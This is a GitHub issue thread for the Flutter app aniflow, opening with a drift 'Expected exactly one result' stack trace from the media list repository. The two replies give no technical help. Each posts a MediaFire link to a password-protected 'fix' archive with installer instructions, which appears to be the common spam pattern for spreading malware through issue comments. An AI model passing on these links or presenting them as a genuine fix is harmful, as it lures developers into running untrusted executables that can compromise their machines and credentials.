### ISSUE TITLE
Bad state: Expected exactly one result, but found more than one!

### ISSUE THREAD

**Issue by andannn** [andannn/aniflow#262]
I/flutter (16198): #0      Selectable.getSingleOrNull (package:drift/src/runtime/query_builder/statements/query.dart:248:7)
I/flutter (16198): <asynchronous suspension>
I/flutter (16198): #1      MediaListRepository.getMediaListItemByMediaId.<anonymous closure> (package:aniflow/core/data/media_list_repository.dart:205:11)
I/flutter (16198): <asynchronous suspension>
I/flutter (16198): #2      MediaListUpdateBloc._init (package:aniflow/feature/media_list_update_page/bloc/media_list_update_bloc.dart:32:19)
I/flutter (16198): <asynchronous suspension>

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
